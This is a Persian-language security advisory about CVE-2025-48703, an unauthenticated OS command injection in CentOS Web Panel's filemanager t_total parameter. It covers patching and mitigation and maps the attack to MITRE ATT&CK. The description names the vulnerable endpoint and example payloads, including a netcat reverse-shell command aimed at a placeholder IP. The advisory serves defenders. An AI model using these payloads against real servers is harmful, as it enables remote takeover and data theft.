خانه » CVE-2025-48703
هشدار‌های سایبری

CVE-2025-48703

Unauthenticated Remote Code Execution in CentOS Web Panel via Filemanager Parameter

توسط Vulnerbyte Alerts
نوشته شده توسط Vulnerbyte Alerts 31 بازدید
هشدار سایبری CVE-2025-48703
  • شناسه CVE-2025-48703 :CVE
  • CWE-78 :CWE
  • yes :Advisory
  • منتشر شده: سپتامبر 19, 2025
  • به روز شده: سپتامبر 19, 2025
  • امتیاز: 9.0
  • نوع حمله: Command Injection
  • اثر گذاری: Remote code execution(RCE)
  • حوزه: وب‌سرورها
  • برند: centos-webpanel
  • محصول: CentOS Web Panel
  • وضعیتPublished :CVE
  • Yes :POC
  • وضعیت آسیب پذیری: patch شده

چکیده

آسیب‌پذیری بحرانی در CWP (Control Web Panel) نسخه‌های قبل از 0.9.8.1205 ناشی از تزریق فرمان سیستم عامل (OS Command Injection) در پارامتر t_total درخواست changePerm ماژول filemanager است که امکان اجرای کد از راه دور بدون نیاز به احراز هویت را فراهم می‌کند. مهاجم با دانستن یک نام کاربری معتبر به غیر از root می‌تواند دستورات دلخواه را روی سرور اجرا کند.

توضیحات

آسیب‌پذیری CVE-2025-48703 در CWP (Control Web Panel)، پنل مدیریت وب سرور، ناشی از عدم پاک‌سازی و اعتبارسنجی پارامتر t_total در درخواست‌های POST به اندپوینت index.php?module=filemanager&acc=changePerm است و مطابق با CWE-78 طبقه‌بندی می‌شود.

در نسخه‌های پیش از 0.9.8.1205، دو ضعف با هم ترکیب شده‌اند که در مورد اول فرآیند احراز هویت به‌درستی برای این مسیر بررسی نمی‌شود و درخواست‌هایی بدون شناسه کاربر نیز پردازش می‌شوند (authentication bypass) و در مورد دوم مقدار t_total مستقیماً در فرمت یک دستور chmod از طریق sh -c اجرا می‌شود. در نتیجه، مهاجمِ از راه دور که یک نام‌کاربری معتبر به غیر از root را بداند می‌تواند مقدار t_total را با متا‌کاراکترهای شل مثلاً $(id), nc 1.2.3.4 9999 -e /bin/bash یا سایر پیلودهای مشابه ارسال کند؛ سپس سرور فرمانی شبیه به chmod $(arbitrary_command) “/home/<user>/<file>” اجرا می‌کند و کاربر می‌تواند فرمان‌های دلخواه از جمله باز کردن reverse shell را روی میزبان اجرا نماید. بهره‌برداری از این ضعف از طریق شبکه ممکن بوده و پیچیدگی آن پایین است یعنی فقط نیاز به دانستن یک نام‌کاربری معتبر و دسترسی به رابط وب CWP دارد، نیازی به تعامل کاربر قربانی نداشته و می‌تواند منجر به اجرای دستور از راه دور (RCE) با دسترسی کاربر لوکال شود.

پیامدها شامل نقض محرمانگی با دسترسی به فایل‌ها و داده‌های حساس، یکپارچگی با تغییر پیکربندی یا فایل‌های سیستمی و در دسترس‌پذیری با ایجاد کرش یا اختلال سرویس است. در عمل مهاجم می‌تواند شل معکوس برقرار کند، فایل‌ها را سرقت یا تغییر دهد و در نهایت به کنترل کامل سرور دست یابند. کد اثبات مفهومی (PoC) و اسکریپت‌های اسکن برای ارسال پیلودهای id یا اجرای nc منتشر شده‌اند که نشان می‌دهد مشکل در نسخه‌های 0.9.8.1188 و 0.9.8.1204 قابل اجرا بوده است.

توسعه‌دهندگان CWP این ضعف را در نسخه 0.9.8.1205 پچ کرده اند.اصلاحات شامل جلوگیری از دورزدن احراز هویت برای این اندپوینت و پاک‌سازی یا محدودسازی سخت گیرانه روی مقدار t_total و حذف اجرای فرمان از طریق sh -c است.

CVSS

Score Severity Version Vector String
9.0 CRITICAL 3.1 CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

 لیست محصولات آسیب پذیر

Versions Product
affected from 0 before 0.9.8.1205 CentOS Web Panel

لیست محصولات بروز شده

Versions Product
0.9.8.1205 and later. CentOS Web Panel

 استفاده محصول در ایران

در این جدول، تعداد صفحات ایندکس‌شده در گوگل با دامنه .ir که CentOS Web Panelرا ذکر کرده اند، ثبت شده است. این داده صرفاً برای برآورد تقریبی حضور محصولات در وب ایران استفاده شده و نمایانگر میزان نصب دقیق و استفاده واقعی نیست.

Approx. Usage in .ir Domain via Google

(Total Pages)

 Product
128 CentOS Web Panel

 نتیجه گیری

این آسیب‌پذیری در CWP با توجه به شدت بحرانی و امکان اجرای کد از راه دور (RCE) از طریق ترکیب ضعف در احراز هویت و تزریق فرمان، تهدیدی جدی برای وب سرورها به شمار می‌رود. مهاجم می‌تواند با دانستن یک نام‌کاربری معتبر به غیر از root کنترل کامل سرور را به دست آورده، داده‌های حساس را سرقت کرده یا سرویس را مختل کند. بنابراین برای جلوگیری از آسیب پذیری اجرای اقدامات زیر توصیه می شود:

  • به‌روزرسانی فوری: CWP را به نسخه 0.9.8.1205 یا بالاتر به‌روزرسانی کنید تا پچ های امنیتی اعمال شود.
  • تغییر نام‌های کاربری: نام‌های کاربری پیش‌فرض یا قابل حدس را تغییر دهید و از رمزهای عبور قوی استفاده کنید.
  • محدودسازی دسترسی شبکه: پورت‌های 2083 و 2087 را پشت فایروال قرار دهید و فقط به IPهای مجاز دسترسی دهید.
  • نظارت بر لاگ‌ها: لاگ‌های cwpsrv و سیستم را برای درخواست‌های مشکوک به filemanager بررسی کنید.
  • استفاده از WAF: فایروال اپلیکیشن وب مانند ModSecurity را برای فیلتر کردن پیلودهای تزریق فرمان فعال کنید.
  • تغییر به پنل‌های امن‌تر: در صورت امکان، از پنل‌های مدیریت سرور امن‌تر مانند cPanel یا Plesk استفاده کنید.
  • آموزش و آگاهی: مدیران سرور را در مورد ریسک OS command injection و اهمیت به‌روزرسانی پنل‌ها آگاه کنید.

اجرای این اقدامات، ریسک اجرای کد از راه دور و نقض امنیت را به حداقل رسانده و امنیت سرورهای CWP را تضمین می‌کند. این آسیب‌پذیری بر اهمیت اعتبارسنجی ورودی‌ها و احراز هویت مناسب در پنل‌های مدیریت سرور تأکید دارد.

امکان استفاده در تاکتیک های Mitre Attack

Initial Access (TA0001)
مهاجم از راه شبکه به اندپوینت وب‌پنل دسترسی پیدا می‌کنه — نیاز به رابط وب CWP + یک نام‌کاربری معتبر غیر root دارد. ضعفِ احراز هویتِ اندپوینت (authentication bypass) یا عدم بررسی صحیحِ session اجازه می‌ده ورودی‌های POST پذیرفته و نقطه‌ی ورود برای بهره‌برداری فراهم شود.

Execution (TA0002)
پارامتر t_total مستقیماً در sh -c چسبونده می شود؛ متاکاراکترهای شل تزریق و فرمان دلخواه (مثلاً $(id)، nc اجرا می‌شوند. احتمالا اجرا با همان امتیاز کاربر سرویس انجام شود.

Persistence (TA0003)
مهاجم میتواند وب‌شل، اسکریپت‌های persist در /etc/cron.*، واحد systemd، یا فایل‌های استارت‌آپ نصب کند؛ همچنین میتواند فایل‌ها /DLL/ باینری‌ در دایرکتوری‌هایی که سرویس در بارگذاری از آنها استفاده می‌کند قرار دهد تا بعد از ری استارت دوباره اجرا شود.

Privilege Escalation (TA0004)
اگر سرویس CWP یا پردازش مرتبط با مجوزهای بالا مثلاً root یا حساب سرویس سطح‌بالااجرا شود یا آسیب‌پذیری محلی دیگری وجود داشته باشد، اجرای کد در آن کانتکست می‌تواند به ارتقای امتیاز مهاجم به سطح سیستم/root منجر شود.

Defense Evasion (TA0005)
مهاجم می‌تواند لاگ‌های cwpsrvوب‌سرور را پاک یا تغییر دهد، timestampها را دستکاری کند، فایل‌های شناسایی را مخفی و مکانیزم‌های مانیتورینگ و EDR را دور بزند یا پروسسهای نظارتی محلی را متوقف کند تا تشخیص و بازیابی سخت شود.

Credential Access (TA0006)
با اجرای کد در سرور، مهاجم می‌تواند فایل‌های پیکربندی مثل فایل‌های حاوی رمز یا API keysفایل‌های بکاپ یا کلیدهای SSH در /home/<user>/.ssh را بخواند و اعتبارنامه‌ها یا توکن‌های اتصال به سرویس‌های /DB را استخراج کند.

Lateral Movement (TA0008)
با استفاده از اعتبارنامه‌های استخراج‌شده یا کانال‌های بازشده (reverse shell, SSH, rsync)، مهاجم می‌تواند به سرورهای دیگر شبکه حرکت کند، سرویس‌های داخلی را هدف بگیرد یا کرنل حمله را گسترش دهد.

Collection (TA0009)
مهاجم می‌تواند دایرکتوری‌های حاوی داده حساس، بکاپ‌ها، فایل‌های تنظیمات سرویس‌ها، و دیتابیس‌ dumps را جمع‌آوری و روی میز کار خود ذخیره کند تا برای استخراج بعدی آماده شود.

Exfiltration (TA0010)
داده‌ها ممکن است از طریق کانال‌های شبکه (reverse shell, nc, HTTP(S) POST/PUT, DNS tunneling) به خارج منتقل می‌شوند. همچنین می‌تواند بسته‌ها را رمزنگاری کند و در ترافیک عادی پنهان کند.

Impact (TA0040)
پیامدها: اجراي کد از راه دور (RCE) در کانتکست کاربر سرویس؛ نقض محرمانگی با دسترسی/سرقت داده‌ها، نقض یکپارچگی با تغییر فایل‌ها/پیکربندی، و کاهش دسترس‌پذیری با خرابی سرویس، پاک‌کردن داده‌ها. در بدترین حالت، مهاجم به کنترل کامل سرور/شبکه دست می‌یابد.

منابع

  1. https://www.cve.org/CVERecord?id=CVE-2025-48703
  2. https://www.cvedetails.com/cve/CVE-2025-48703/
  3. https://fenrisk.com/rce-centos-webpanel
  4. https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-48703
  5. https://vuldb.com/?id.325067
  6. https://github.com/itstarsec/CVE-2025-48703/blob/main/PoC.txt
  7. https://cwe.mitre.org/data/definitions/78.html

همچنین ممکن است دوست داشته باشید

CVE-2025-10964

CVE-2025-10975

CVE-2025-10911

CVE-2025-10994

CVE-2025-10540

CVE-2025-10137

CVE-2025-10127

CVE-2025-10634

CVE-2025-10960

CVE-2025-10958

پیام بگذارید

نام ، ایمیل و وب سایت خود را برای بار دیگر که اظهار نظر می کنم در این مرورگر ذخیره کنید.

send
سوالی دارید؟
می تونید از من بپرسید 👋 ×